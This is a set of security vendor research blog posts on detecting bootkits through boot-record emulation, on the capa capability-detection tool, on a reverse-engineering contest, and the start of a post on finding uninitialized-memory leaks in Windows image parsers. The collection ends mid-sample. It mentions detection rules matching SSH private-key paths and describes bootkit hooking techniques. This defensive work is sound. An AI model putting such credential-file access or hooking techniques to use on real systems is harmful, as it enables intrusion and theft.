BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is at least 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)	Avg # Unique Boot Records (md5)
100-1000	428
1000-10000	4,738
10000+	8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.
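As an illustration, the partial hash above can be sketched in a few lines of Python. This is a minimal sketch rather than the production code: the two byte ranges come from the formula in the text, while the function name and the synthetic sectors are assumptions made for the example.

```python
import hashlib


def partial_mbr_hash(mbr: bytes) -> str:
    """MD5 over bytes [0:218] and [224:440] of an MBR sector.

    The ranges come from the formula in the text; the function name is
    hypothetical.
    """
    if len(mbr) < 440:
        raise ValueError("expected at least 440 bytes of MBR data")
    return hashlib.md5(mbr[0:218] + mbr[224:440]).hexdigest()


# Two synthetic 512-byte sectors: identical in the hashed ranges,
# different in the bytes that the partial hash skips.
base = bytearray(512)
base[0:3] = b"\xfa\x33\xc0"                    # arbitrary stand-in for boot code
other = bytearray(base)
other[218:224] = b"\x01\x02\x03\x04\x05\x06"   # inside the skipped gap
other[440:444] = b"\xde\xad\xbe\xef"           # past the end of the hashed range

full_hashes_differ = hashlib.md5(base).hexdigest() != hashlib.md5(other).hexdigest()
partial_hashes_match = partial_mbr_hash(bytes(base)) == partial_mbr_hash(bytes(other))
print(full_hashes_differ, partial_hashes_match)
```

The two sectors hash differently as whole records but identically under the partial hash, which is the effect that reduced the record count. The special cases mentioned above (Altiris, SafeBoot, PGPGuard) would each need their own offsets, which this sketch does not attempt.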

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

A reliable collection of boot records from systems
A behavioral analysis of boot records, not just static analysis
The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).

Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing the assembly instruction as it executes to ultimately arrive at the “execution hash”.

Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!
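The execution hash and the "rare hash" indicator can be sketched as follows. This is a simplified illustration that assumes the emulator has already produced an ordered list of mnemonics per host; the function names, host names, and traces are hypothetical, and the real system derives the mnemonics from Unicorn emulation rather than from hard-coded lists.

```python
import hashlib
from collections import Counter


def execution_hash(mnemonics):
    """MD5 over the concatenated mnemonics, in execution order."""
    digest = hashlib.md5()
    for mnemonic in mnemonics:
        digest.update(mnemonic.encode("ascii"))
    return digest.hexdigest()


def rare_hashes(host_traces, max_hosts=1):
    """Return execution hashes seen on at most max_hosts hosts."""
    counts = Counter(execution_hash(trace) for trace in host_traces.values())
    return {h for h, n in counts.items() if n <= max_hosts}


# Hypothetical traces: three hosts run the same code, one host differs.
traces = {
    "host-a": ["and", "mov", "shl", "or"],
    "host-b": ["and", "mov", "shl", "or"],
    "host-c": ["and", "mov", "shl", "or"],
    "host-d": ["xor", "mov", "int", "jmp"],
}
outliers = rare_hashes(traces)
print(outliers == {execution_hash(traces["host-d"])})
```

Because only mnemonics are hashed, operands such as strings and offsets do not affect the result, so functionally identical samples fold together. The threshold for "only found on a few systems" is a tuning choice; `max_hosts=1` here is purely illustrative.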

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.
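A check of this kind can be sketched as a classifier over the memory writes observed during emulation. The sketch below is an assumption-laden illustration, not the analytic engine itself: the function names are hypothetical, the BDA is taken to span 256 bytes, and the base memory size word is taken to sit at 0040:0013h, which are conventional PC BIOS layout details rather than facts stated in this post.

```python
IVT_START, IVT_END = 0x0000, 0x03FF   # 256 vectors of 4 bytes each
BDA_START, BDA_END = 0x0400, 0x04FF   # segment 0040h; 256-byte size assumed
BDA_MEM_SIZE = 0x0413                 # 0040:0013h, base memory size word (assumed)


def linear(segment, offset):
    """Convert a real-mode segment:offset pair to a linear address."""
    return (segment << 4) + offset


def classify_write(segment, offset, size):
    """Describe which boot-time structures a memory write touches."""
    start = linear(segment, offset)
    end = start + size - 1
    findings = []
    if start <= IVT_END and end >= IVT_START:
        first_vec = max(start, IVT_START) // 4
        last_vec = min(end, IVT_END) // 4
        findings += [f"IVT vector {v:02X}h" for v in range(first_vec, last_vec + 1)]
    if start <= BDA_END and end >= BDA_START:
        if start <= BDA_MEM_SIZE + 1 and end >= BDA_MEM_SIZE:
            findings.append("BDA memory size")
        else:
            findings.append("BDA")
    return findings


print(classify_write(0x0000, 0x004C, 4))   # 4-byte write at the INT 13h vector
print(classify_write(0x0040, 0x0013, 2))   # 2-byte write to the memory size word
print(classify_write(0x07C0, 0x0000, 2))   # write into the loaded boot sector
```

In an emulator such as Unicorn, a function like this would be called from a memory-write hook. A write to the INT 13h vector or to the memory size field is not proof of compromise on its own, so in practice it would be one signal among several.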

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost: it is orders of magnitude slower than static analysis or hashing. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.
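The serial estimate is straightforward arithmetic, and the same calculation shows why parallelism matters. The sketch below uses the two figures from the text (20,000 records, 4.83 seconds each); the worker count of 1,000 is a hypothetical value chosen only to illustrate the effect, and the model ignores startup and queuing overhead.

```python
import math

RECORDS = 20_000            # from the text
SECONDS_PER_RECORD = 4.83   # from the text


def wall_clock_hours(records, seconds_each, workers=1):
    """Idealized wall-clock time when records are split evenly across workers."""
    batches = math.ceil(records / workers)
    return batches * seconds_each / 3600


serial = wall_clock_hours(RECORDS, SECONDS_PER_RECORD)
parallel = wall_clock_hours(RECORDS, SECONDS_PER_RECORD, workers=1000)  # hypothetical
print(f"serial: {serial:.1f} h, 1000 workers: {parallel * 3600:.1f} s")
```

Run serially, the batch takes roughly 26.8 hours; spread evenly over 1,000 concurrent workers, the idealized figure drops to under two minutes.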

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.

Figure 3: Boot record analysis workflow

Our design currently utilizes:

API Gateway to provide a RESTful interface.
Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
DynamoDB to track progress of processed boot records through the system.
S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.
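The submit-then-poll pattern used by the IR server can be sketched generically. Everything named here is hypothetical: the post does not describe the REST endpoints or response fields, so the sketch takes the status call as an injected function and uses an in-memory stand-in instead of a real HTTP client.

```python
import time


def poll_until_complete(get_status, batch_id, interval=5.0, timeout=600.0,
                        sleep=time.sleep):
    """Call get_status(batch_id) until it reports completion or time runs out."""
    waited = 0.0
    while True:
        status = get_status(batch_id)
        if status["state"] == "complete":
            return status["reports"]
        if waited >= timeout:
            raise TimeoutError(f"batch {batch_id} not finished after {timeout} seconds")
        sleep(interval)
        waited += interval


# In-memory stand-in for the REST interface (hypothetical response shape).
_responses = iter([
    {"state": "processing"},
    {"state": "processing"},
    {"state": "complete", "reports": ["report-1", "report-2"]},
])


def fake_get_status(batch_id):
    return next(_responses)


reports = poll_until_complete(fake_get_status, "batch-001", sleep=lambda s: None)
print(reports)
```

Passing the status function and the sleep function as parameters keeps the loop testable without network access; a real client would wrap an authenticated HTTP request in `get_status`.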

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the X15 engine, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

ELFant in the Room – capa v3

Threat Research

Willi Ballenthin

15 September 2021 at 13:00

Since our initial public release of capa, incident responders and reverse engineers have used the tool to automatically identify capabilities in Windows executables. With our newest code and ruleset updates, capa v3 also identifies capabilities in Executable and Linkable Format (ELF) files, such as those used on Linux and other Unix-like operating systems. This blog post describes the extended analysis and other improvements. You can download capa v3 standalone binaries from the project’s release page and check out the source code on GitHub.

ELF File Format Support

capa finds capabilities in programs by parsing executable file formats, disassembling code, and then recognizing features in functions. In versions v1 and v2, capa only understood the PE file format, so its analysis was restricted to Windows programs. Thanks to our colleagues at Intezer, capa now recognizes ELF files! This means you can use the tool to identify behaviors in malware that targets Linux computers. Figure 1 shows a rule that describes techniques to fetch the current user on Linux.

Figure 1: capa rule identifying capabilities on Linux

We’re excited Intezer leverages capa and thrilled they are sharing their improvements with the community. In addition to the code updates, Intezer proposed 36 capa rules to identify various capabilities in ELF files, such as reconnaissance, persistence, and host interaction techniques. Please read Intezer’s blog post for more details.

New Features capa Can Recognize

As we taught capa to recognize ELF files, we also wanted rule authors to tune their rules to find behaviors specific to different operating systems (OS), CPU architectures, and file formats. For example, the APIs exposed by Windows are very different from those found on Linux systems; therefore, rules should clearly designate which pattern to use on Windows versus Linux.

Based on discussions and feedback collected from users and contributors, we've extended capa’s rule format to describe OSes, CPU architectures, and file formats. The rule shown in Figure 2 uses os features to distinguish techniques used to get networking interface information on Windows and Linux. Note that the rule is explicit about which APIs are found on each OS, making it easy for both humans and machines to interpret the matching logic.

Figure 2: capa rule using the os feature to distinguish OS specific features

We’ve also added arch (such as arch: i386 for 32-bit Intel code) and format (such as format: elf for ELF files) features to distinguish between CPU architectures and file formats. To learn more about these and capa’s rule syntax see the rule format documentation on GitHub.

Unfortunately, rules with these new features are not backwards compatible with older versions of capa. Therefore, we recommend upgrading your capa installation to take advantage of our enhanced rules.

Substring Features

To make many rules easier to read, we’ve added a convenience feature named substring that acts like a literal string match with implied leading and trailing wildcards. This makes it easier to match file path components, such as /.ssh/id_rsa. Previously, users had to wrap a substring with forward slashes and escape special characters with backslashes, leading to nearly incomprehensible character sequences. Now, a substring feature clearly describes a literal string found as part of a longer string. Figure 3 shows how much easier it is to read a substring feature.

Figure 3: Old- and new-style ways of describing a substring
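The difference between a regular-expression match and a literal substring match can be illustrated in plain Python. This is an analogy only, not capa's matching code: the helper names are hypothetical, and Python's `re` syntax stands in for the slash-delimited patterns used in capa rules.

```python
import re


def matches_substring(needle, haystack):
    """Literal match anywhere in the string, like implied wildcards on both ends."""
    return needle in haystack


def matches_regex(pattern, haystack):
    """Regular-expression search; special characters must be escaped by the author."""
    return re.search(pattern, haystack) is not None


path = "/home/user/.ssh/id_rsa"
lookalike = "/home/user/xssh/id_rsa"

print(matches_substring("/.ssh/id_rsa", path))        # literal text, no escaping
print(matches_regex(r"/\.ssh/id_rsa", path))          # the dot must be escaped
print(matches_regex(r"/.ssh/id_rsa", lookalike))      # unescaped dot matches any character
print(matches_substring("/.ssh/id_rsa", lookalike))   # literal match rejects the lookalike
```

The third call shows the kind of mistake the substring feature avoids: a forgotten escape silently widens the pattern, whereas a literal substring needs no escaping at all.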

Figure 4 shows a capa rule using a substring feature to describe a persistence location on Linux.

Figure 4: capa rule using the substring feature to identify persistence on Linux systems

Conclusion

The newest improvements add ELF file analysis support to capa and make its rules even more expressive. We thank the community and notably Intezer for their continued support. We love the collaboration and are excited for future opportunities. The v3 capa release also includes bug fixes, improvements to the IDAPython plugin capa explorer, and more than 50 new rules. See the capa changelog for all update details.

The new capa release is available on the release page and on PyPI. capa’s code and rules are available on GitHub. If you have any questions or feedback, please open an issue or discussion in the respective repository.

Announcing the Eighth Annual Flare-On Challenge

Threat Research

Nick Harbour

12 August 2021 at 15:30

The FLARE team is once again hosting its annual Flare-On challenge, now in its eighth year. Take this opportunity to enjoy some extreme social distancing by solving fun puzzles to test your mettle and learn new tricks on your path to reverse engineering excellence. The contest will begin at 8:00 p.m. ET on Sept. 10, 2021. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Oct. 22, 2021.

This year’s contest will consist of 10 challenges and feature a variety of formats, including Windows, Linux, and JavaScript. This is one of the few Windows-centric CTF contests out there and we have crafted it to represent the skills and challenges our FLARE team faces.

If you smash your way through all 10 challenges, you will receive a prize and permanent recognition on the Flare-On website to honor your greatness. Prize details will be revealed later, but as always, it will be worthwhile swag to earn the envy of your peers. Prior years’ prizes were belt buckles, a replica police badge, a challenge coin, a medal, a massive pin, and a cyber-styled skeleton key.

Check the Flare-On website for a live countdown timer, to view the previous year’s winners, and to download past challenges and solutions for practice. For official news and information, we will be using the Twitter hashtag: #flareon8.

capa 2.0: Better, Faster, Stronger

Threat Research

William Ballenthin

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and check out the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.

Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.

Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.

Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.

Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor, allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.

Figure 5: capa v1.6 results without library code recognition

Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!
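A quick back-of-the-envelope check shows why the signature-matching overhead is described as negligible. The sketch uses only the figures quoted above (206 samples, 186,000 functions, 28% library code, around 100,000 functions/sec); the variable names are illustrative, and the per-sample average assumes functions are spread evenly across samples, which real testbeds will not match exactly.

```python
SAMPLES = 206
TOTAL_FUNCTIONS = 186_000
LIBRARY_PERCENT = 28
MATCH_RATE_PER_SEC = 100_000   # approximate rate quoted in the text

library_functions = TOTAL_FUNCTIONS * LIBRARY_PERCENT // 100
matching_seconds = TOTAL_FUNCTIONS / MATCH_RATE_PER_SEC
seconds_per_sample = matching_seconds / SAMPLES

print(library_functions)             # functions skipped by rule matching
print(round(matching_seconds, 2))    # signature matching time for the whole testbed
print(round(seconds_per_sample * 1000, 1), "ms per sample on average")
```

Roughly 52,000 functions are skipped, while signature matching across the entire testbed costs under two seconds in total, or about 9 ms per sample on average.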

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.

Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in highly optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
- C and C++ run-time libraries
- Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
The following open-source projects as compiled with VS2015, VS2017, and VS2019:
- CryptoPP
- curl
- Microsoft Detours
- Mbed TLS (previously PolarSSL)
- OpenSSL
- zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpkg and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

Host Interaction describes program functionality to interact with the file system, processes, and the registry
Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
Collection describes functionality used to steal data such as credentials or credit card information
Data Manipulation describes capabilities to encrypt, decrypt, and hash data
Communication describes data transfer techniques such as HTTP, DNS, and TCP

Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPI use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Fuzzing Image Parsing in Windows, Part Two: Uninitialized Memory

Threat Research

Dhanesh Kizhakkinan

3 March 2021 at 19:30

Continuing our discussion of image parsing vulnerabilities in Windows, we take a look at a comparatively less popular vulnerability class: uninitialized memory. In this post, we will look at Windows’ inbuilt image parsers—specifically for vulnerabilities involving the use of uninitialized memory.

The Vulnerability: Uninitialized Memory

In unmanaged languages such as C or C++, local variables and heap allocations are not initialized by default. Reading an uninitialized variable is undefined behavior and may cause a crash. There are roughly two variants of uninitialized memory:

Direct uninitialized memory usage: An uninitialized pointer or index is used in a read or write. This may cause a crash.
Information leakage (info leak) through usage of uninitialized memory: Uninitialized memory content is accessible across a security boundary. An example: an uninitialized kernel buffer accessible from user mode, leading to information disclosure.

In this post we will be looking closely at the second variant in Windows image parsers, which will lead to information disclosure in situations such as web browsers where an attacker can read the decoded image back using JavaScript.

Detecting Uninitialized Memory Vulnerabilities

Compared to memory corruption vulnerabilities such as heap overflow and use-after-free, uninitialized memory vulnerabilities on their own do not access memory out of bounds or out of scope. This makes them slightly harder to detect than memory corruption vulnerabilities. While direct uninitialized memory usage can cause a crash and can be detected that way, information leakage doesn’t usually cause any crashes. Detecting it requires compiler instrumentation such as MemorySanitizer or binary instrumentation tools such as Valgrind.

Detour: Detecting Uninitialized Memory in Linux

Let's take a little detour and look at detecting uninitialized memory in Linux and compare with Windows’ built-in capabilities. Even though compilers warn about some uninitialized variables, most of the complicated cases of uninitialized memory usage are not detected at compile time. For this, we can use a run-time detection mechanism. MemorySanitizer is a compiler instrumentation available in Clang (GCC does not implement it) that detects uninitialized memory reads. A sample of how it works is given in Figure 1.

$ cat sample.cc
#include <stdio.h>

int main()
{
    int *arr = new int[10];
    if(arr[3] == 0)
    {
        printf("Yay!\n");
    }
